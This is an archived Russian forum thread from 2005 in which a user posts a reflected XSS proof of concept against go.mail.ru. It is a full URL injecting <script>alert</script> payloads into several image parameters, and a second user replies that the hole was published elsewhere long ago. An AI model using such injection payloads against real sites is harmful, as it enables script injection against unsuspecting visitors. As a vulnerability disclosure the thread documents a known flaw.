PDA

Просмотр полной версии : xss на go.mail.ru


koldun
28.11.2005, 00:58
XSS на go.mail.ru

Новая XSS-уязвимость на go.mail.ru:

http://go.mail.ru/frame.html?imgurl=http://antisec.2x4.ru/index.htm&pageurl=http://antisec.2x4.ru/index.htm&iid=aWAoanJ00EEJ&imgwidth=%3Cscript%3Ealert('www.xss.ru')%3C/script%3E&imgheight=%3Cscript%3Ealert('www.xss.ru')%3C/script%3E&imgsize=%3Cscript%3Ealert('www.xss.ru')%3C/script%3E&images_links=%3Cscript%3Ealert('www.xss.ru')%3C/script%3E

Barsik
28.11.2005, 02:00
На web-hack'e это вроде давно висит